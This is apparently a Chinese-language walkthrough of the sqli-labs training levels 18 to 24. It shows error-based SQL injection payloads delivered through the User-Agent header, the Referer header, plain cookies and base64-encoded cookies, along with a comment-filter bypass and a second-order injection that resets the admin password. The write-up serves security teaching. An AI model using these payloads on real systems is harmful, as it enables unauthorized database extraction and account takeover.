【less-18】
打开时,获取了自己的IP地址。,通过分析源码知道,会将用户的user-agent作为参数记录到数据库中。
data:image/s3,"s3://crabby-images/c59d6/c59d6575cb7698454be8bd331b3aff163d445ec7" alt=""
提交的是信息有user-Agent、IP、uname信息。
data:image/s3,"s3://crabby-images/85a41/85a41b45041e5d63ff5c67ab40618c42642326ad" alt=""
此时可以借助Burp Suite 工具,修改user_agent,实现sql注入。
data:image/s3,"s3://crabby-images/74611/746118fca43e3fcba9d14a1fa696b4f331bd376c" alt=""
最后得到数据库名:security。
解题步骤:
bash
//第一步获取数据库名
' and updatexml(1,concat(0x7e,(select database()),0x7e),1),1,1) -- +
//第二步获取数据表名
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1),1,1) -- +
//第三步获取数据表字段
' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='emails' ),0x7e),1),1,1) -- +
【less-19】
与less-18,唯一的区别是,提交的信息不再是user-agent,而是referer。
data:image/s3,"s3://crabby-images/36114/361145110e609d0b8f6248628b38e2acfdf4bb5d" alt=""
解题步骤:
bash
//第一步获取数据库名
' and updatexml(1,concat(0x7e,(select database()),0x7e),1),1) -- +
//第二步获取数据表名
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1),1,1) -- +
//第三步获取数据表字段
' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='emails' ),0x7e),1),1,1) -- +
【less-20】
data:image/s3,"s3://crabby-images/7211e/7211e068e1ba5a8842d597aa623174e7d72c7629" alt=""
从上图的信息可以看出登录之后,记录的信息是类似的,根据前两题的经验,尝试使用user-agent、referr、cookie信息进行注入。
经过验证将抓包的cookie进行更改
data:image/s3,"s3://crabby-images/10e9d/10e9d3fdc4d1e90b0fcd48f5be6a8990f632e183" alt=""
改为:
data:image/s3,"s3://crabby-images/6ae60/6ae602f3e81415326e733c51da8c02b5ec312863" alt=""
结果为:
data:image/s3,"s3://crabby-images/d3cb3/d3cb38e37c5ece3bcfa7ba8bb43d7d3c39f2ac44" alt=""
其他步骤:
bash
# 第二步获取数据表名
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) -- +
# 第三步获取数据表字段
' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='emails' ),0x7e),1) -- +
【less-21】
通过抓包和源码分析可以得出:less-21使用的是cookie,而且还是base64加密的。
data:image/s3,"s3://crabby-images/04f23/04f23900d07b804764987ec06fb15b2b55552237" alt=""
和Less-20注入原理相同,不同的是在修改cookie时,先转成base64的值。
data:image/s3,"s3://crabby-images/a29bd/a29bd92adbd923d43099bfccb602048e53bc1d8d" alt=""
先将注入编码进行base64编码。
data:image/s3,"s3://crabby-images/4dbba/4dbba8d47b3f38819fb7b3500ae3e23150365d7c" alt=""
然后再把编制的码代入到cookie中。
data:image/s3,"s3://crabby-images/66f19/66f1986b2699bec43f335dae8e13bf88bd64b291" alt=""
出现错误,是因为"-- +"在进行base64编码时出现了问题。
可以将"-- +" 替换为 '1' = '1
具体代码:
bash
admin 'and updatexml(1,concat(0x7e,(select database(),0x7e),1) -- +
#改为
admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1
#对应的base64编码
YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpLDEpIGFuZCAnMSc9JzE=
调试结果:
data:image/s3,"s3://crabby-images/2b858/2b8583d4ffe2831df0c6bc5b9d4893bb86a4ec1f" alt=""
其他步骤和Less-20类似,区别都是要变成base64加密。
bash
# 第二步获取数据表名
admin' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) and '1'='1
# 第三步获取数据表字段
admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='emails' ),0x7e),1) and '1'='1
【less-22】
data:image/s3,"s3://crabby-images/6a277/6a277f4cb2a3899d3fbf86619bf31f79dca4d872" alt=""
通过分析源码得知,基本Less-21相似,唯一的区别就是单引号变成了双引号。
解题步骤和Less-21相同。
bash
#第一步获取数据库
admin "and updatexml(1,concat(0x7e,(select database()),0x7e),1) and "1"="1
# 第二步获取数据表名
admin" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) and "1"="1
# 第三步获取数据表字段
admin" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="emails" ),0x7e),1) and "1"="1
结果:
data:image/s3,"s3://crabby-images/13135/13135bacf2ca707b2934cfe5a576113475eddc11" alt=""
【less-23】
less-23是一种GET方式的注入,使用之前的方式,发现无法注入,分析源码,得知之前用的 注释(-- 和# 都被替换了空)。
data:image/s3,"s3://crabby-images/7c282/7c28260554d35158b2bf619f043793153983b08b" alt=""
此时尝试一种新的注释方式: '1' ='1 以消除原本SQL语句中的引号。
解题方法:
bash
# 获取数据库名
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1
# 获取数据表名
' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x7e),1) or '1'='1
# 获取数据字段
' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),0x7e),1) or '1'='1
结果为:
data:image/s3,"s3://crabby-images/fad9d/fad9dfb8ef683a1874ccffa04be5b1c10a7682b4" alt=""
【less-24】
less24是一个二次注入的案例。
分析源码:
data:image/s3,"s3://crabby-images/3f3bd/3f3bdeabf8c72539a49abad3a994ac02d9c8247b" alt=""
可以看出只有用户名(username)没有用mysql_real_escape_string()对特殊字符进行转义。
解题步骤:
1.注册admin用户
data:image/s3,"s3://crabby-images/2381f/2381fe623725e6ce72fe07d878ca293c8fd34524" alt=""
2.登录并修改admin密码
data:image/s3,"s3://crabby-images/41f9a/41f9a769544033475b149b6fa862c583eb9c973a" alt=""
3.尝试使用admin账号和新密码登录,破解管理员账号。
data:image/s3,"s3://crabby-images/aa2d7/aa2d77f4f58ac243ad0a92acf15457486b78ffbc" alt=""
data:image/s3,"s3://crabby-images/2beb7/2beb76143976bdfb1d241631c55955873a2d172a" alt=""